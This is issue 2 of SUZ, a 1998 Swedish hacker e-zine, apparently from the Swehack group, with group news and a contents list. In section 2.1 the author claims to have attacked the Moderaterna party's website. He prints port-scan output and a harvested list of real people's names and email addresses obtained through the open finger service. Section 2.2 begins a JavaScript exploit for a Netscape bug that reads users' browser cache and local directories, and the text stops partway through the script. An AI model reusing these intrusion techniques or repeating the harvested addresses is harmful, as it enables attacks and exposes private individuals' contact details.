____________________________________________________________________________ =======S====T====A====R====T=========O=====F=========F====I====L====E======= S W E H A C K U N D E R G R O U N D ______ _____ __ _ _______ ____/ | | \ | |______ /_____ __|__ | \_| |______ N U M M E R 2 ____________________________________________________________________________ I N N E H Å L L I S U Z # 2 [0.1] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ¤ Innehåll..............................................................0.1 ¤ Disclaimer............................................................0.2 ¤ Medarbetare...........................................................0.3 ¤ Ledare................................................................0.4 {s w e h a c k} ¤ Kanalen...............................................................1.1 ¤ Hemsidan..............................................................1.2 {h a c k i n g} ¤ Moderaternas hemsida hackad utan förvåning............................2.1 ¤ Netscape JavaScript bug...............................................2.2 ¤ www.rootshell.com hackad..............................................2.3 ¤ BUTTSniffer 0.9 ute nu................................................2.4 {ö v r i g t} ¤ Novell har nått toppen................................................3.1 ¤ Microsoft mot Linux...................................................3.2 ¤ SUN utvecklar jini....................................................3.3 ¤ Linux på frammarsch...................................................3.4 ¤ Flashback döms att betala 50.000 kr. till sexförbrytare...............3.5 ¤ Är Internet fritt?....................................................3.6 {f a s t a a v d e l n i n g a r} ¤ Frågor & svar.........................................................4.1 ¤ Insändar debatt.......................................................4.2 ¤ Svarta Börsen.........................................................4.3 - säljes - köpes - övrigt ¤ Hyperlänkar...........................................................4.4 ____________________________________________________________________________ D I S C L A I M E R [0.2] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ All information i denna filen är skriven i utbildnings syfte. Ni kan aldrig komma och påstå att denna filen uppmanar till brott eller något annat olag- ligt. Allt ni gör efter att ni läst något ur denna filen är helt på er egen risk och ni har själv allt ansvar för följderna. Vi avskriver oss härmed allt ansvar för era handlingar. ____________________________________________________________________________ M E D A R B E T A R E [0.3] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Axxezz*Denied -=- [---] dumone -=- [dum_one@hotmail.com] JÁ±CͦK¤SM̦_EÏ -=- [jacksmiley@hotmail.com] ____________________________________________________________________________ L E D A R E [0.4] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Så är äntligen andra numret av SUZ färdigt. Denna gången blev numret heller inte så värst stort som vi hade hoppats på. Det ligger till så att jag, Contagion, inte har alltför mycket tid till att skriva artiklar. Jag lägger redan ner en stor del av min fritid på både på att uppdatera Swehacksidan, sammanställa SUZ, hålla mig uppdaterad inom hackingvärlden och andra saker som är nödvändiga för att Swehack ska fortsätta att utvecklas positivt. Hur som helst så hoppas vi på att kunna fortsätta att ge ut åtminstone ett nummer varje månad. Det hade förstås varit roligt ifall utgivningshastig- heten hade ökat och det är även vad jag sattsar på i framtiden. Men som jag tidigare sagt så är det ytterst Ni som bestämmer om detta genom er aktivitet. Nästa nummer planeras i varje fall att inte komma ut från ungefär en månad. En del kan få problem när de läser SUZ eftersom SUZ använder en layout som bygger på att läsarna använder något s.k. monospace-typsnitt. Monospace- typsnitt är typsnitt där alla tecken är lika breda, exempel på sådana typsnitt är courier och geneve. Times är ett exempel på ett typsnitt som inte är ett monospace-typsnitt. Om ni på något sätt inte vill använda ett monospace-typsnitt när ni läser er e-mail så går det även bra att läsa SUZ på WWW. Om ni läser SUZ i notepad så fungerar det också bra. Som vanligt så ber vi er att skicka oss artiklar, nyheter, länkar, inlägg, annonser mm. för publicering i nästa nummer. Gör Ni det så kommer förhoppningsvis nästa nummer av SUZ ut som planerat, alltså någon gång i nästa månad. Tankar och idéer på vad som kan förbättras tags också tacksamt emot. Må väl! // Contagion | con@linux.nu | 98-11-17 Allt rörande SUZ kan skickas till suz@linux.nu ____________________________________________________________________________ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ <-------------------------<--<<---<<<--->>>--->>-->------------------------> <-------------------------< S W E H A C K >------------------------> <-------------------------<--<<---<<<--->>>--->>-->------------------------> ____________________________________________________________________________ K A N A L E N [1.1] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Sedan sist har det inte hänt allt för mycket med kanalen. Den har fortsatt att vara en mötesplats för svenska hackers och det är jag glad över. Antalet personer i kanalen har i varje fall inte minskatt så det ser ljust ut. En bot planeras komma upp så småningom, när vet jag dock fortfarande inte. Swehacks IRCkanal:....................#Swehack...DALnet (irc.dal.net) ____________________________________________________________________________ H E M S I D A N [1.2] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Som ni säkert har sätt så har Swehacks hemsida fått ett helt nytt utseende. Sajten är numera uppdelad i färre sektioner, men varje sektion har många under sektioner så allt som allt så har sajten byggts ut. Bl.a. har SUZ fått en egen liten avdelning och i filarkivet har det tagits ett ryck. Jag hoppas att sajten numera är bättre än innan, både navigeringsmässigt, designmässigt och innehållssmässigt. Jag vet att det finns mycket som kan förbättras men det är svårt att se alla själv fel. Därför ber jag er om hjälp för att sajten ska kunna förbättras ytterligare. Skicka mig några rader med dina tankar och idéer om sidan så ska jag se vad jag kan göra för att förbättra den. Swehacks hemsida:.....................http://www.flashback.net/~mm/swehack/ http://swehack.cjb.net/ ____________________________________________________________________________ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ <-------------------------<--<<---<<<--->>>--->>-->------------------------> <-------------------------< H A C K I N G >------------------------> <-------------------------<--<<---<<<--->>>--->>-->------------------------> ____________________________________________________________________________ M O D E R A T E R N A H A C K A D E [2.1] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Det är inte så konstigt att Moderaternas hemsida blev hackad strax innan valet. Det gjorde jag i somras, ni kan själva se hur det såg ut. Scanning host 194.198.105.25, ports 0 to 1000 Port 7 found. Desc='echo' Port 9 found. Desc='discard' Port 17 found. Desc='qotd' Port 19 found. Desc='chargen' Port 23 found. Desc='telnet' Port 21 found. Desc='ftp' Port 25 found. Desc='smtp' Port 80 found. Desc='www' Port 13 found. Desc='daytime' Port 79 found. Desc='finger' Port 110 found. Desc='pop3' Port 135 found. Port 139 found. Desc='nbsession' Port 157 found. Done! crew 98 E-mail: crew98@moderat.se A-Adresser E-mail: A-Adresser@moderat.se A-Aktiviteter E-mail: A-Aktiviteter@moderat.se A-FS E-mail: A-FS@moderat.se A-Medlemsstatistik E-mail: A-Medlemsstatistik@moderat.se A-Nomineringar E-mail: A-Nomineringar@moderat.se A-Övrigt E-mail: A-Övrigt@moderat.se A-Radio E-mail: A-Radio@moderat.se A-Val98/alla partier E-mail: "A-Val98/alla partier"@moderat.se A:E:1997:2 E-mail: "A:E:1997:2"@moderat.se A:E:1997:3 E-mail: "A:E:1997:3"@moderat.se A:E:1997:4 E-mail: "A:E:1997:4"@moderat.se AB-Debatt E-mail: AB-Debatt@moderat.se AB-DS E-mail: AB-DS@moderat.se AB-Ekonomi/Abete E-mail: "AB-Ekonomi/Abete"@moderat.se AB-Faktablad/Rapporter E-mail: "AB-Faktablad/Rapporter"@moderat.se AB-Föreningsledare E-mail: AB-Föreningsledare@moderat.se AB-Företrädare E-mail: AB-Företrädare@moderat.se AB-Information E-mail: AB-Information@moderat.se AB-Instruktioner E-mail: AB-Instruktioner@moderat.se AB-Internt E-mail: AB-Internt@moderat.se AB-ITgrupp E-mail: AB-ITgrupp@moderat.se AB-Landstinget E-mail: AB-Landstinget@moderat.se AB-Namnlista E-mail: AB-Namnlista@moderat.se AB-Övrigt E-mail: AB-Övrigt@moderat.se AB-Pressmeddelanden E-mail: AB-Pressmeddelanden@moderat.se AB-Stockholm E-mail: AB-Stockholm@moderat.se AB-Stockholms län E-mail: AB-Stockholms.län@moderat.se AB-Stockholms stad E-mail: AB-Stockholms.stad@moderat.se AB-Stockholmsdebatt E-mail: AB-Stockholmsdebatt@moderat.se AB-TipsIdåer E-mail: AB-TipsIdåer@moderat.se AB-Trafikdebatt E-mail: AB-Trafikdebatt@moderat.se AB-Valledning E-mail: AB-Valledning@moderat.se AB-Valmaterial E-mail: AB-Valmaterial@moderat.se AB-Valsedlar E-mail: AB-Valsedlar@moderat.se AB-Valstugor E-mail: AB-Valstugor@moderat.se AB-Vård/Omsorg E-mail: "AB-Vård/Omsorg"@moderat.se Anders Åberg E-mail: anders.aberg@moderat.se Dan Åberg E-mail: dan.aberg@moderat.se Mathias M.a.t. Åberg E-mail: Mathias.M.a.t..Åberg@moderat.se Mathias Åberg E-mail: Mathias.Åberg@moderat.se Ingvar Abrahamson E-mail: Ingvar.Abrahamson@moderat.se Annica Abrahamsson E-mail: Annica.Abrahamsson@moderat.se Birgitta Abrahamsson E-mail: Birgitta.Abrahamsson@moderat.se Björn Abrahamsson E-mail: Björn.Abrahamsson@moderat.se Björn K.G. Abrahamsson E-mail: Björn.K.G..Abrahamsson@moderat.se Johan Abrahamsson E-mail: Johan.Abrahamsson@moderat.se Lars Å.E. Abrahamsson E-mail: Lars.Å.E..Abrahamsson@moderat.se Maria Abrahamsson E-mail: Maria.Abrahamsson@moderat.se Telnetade till port 79 på servern. Inte smart av admin att ha port 79 öppen. ---------------------------------------------------------------------------- Skrivet av dumone | dum_one@hotmail.com ---------------------------------------------------------------------------- ____________________________________________________________________________ N E T S C A P E J A V A S C R I P T B U G [2.2] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Det finns en bug i Netscape Communicator under wincrap (sannerligen också under andra OS) som tillåter att läsa användarens cache. Dessa scripten fångar upp användarens sist besökta URL:er och den informationen som kan hittas i GET-formulär. Man kan även använda buggen till att läsa innehållet i lokala kataloger. For att läsa cache: För att läsa innehållet i lokala kataloger: sl=window.open('wysiwyg://1/about:cache'); //For Netscape 3.04 remove 'wysiwyg://1/' sl2=sl.window.open(); sl2.location="javascript:function f() {s='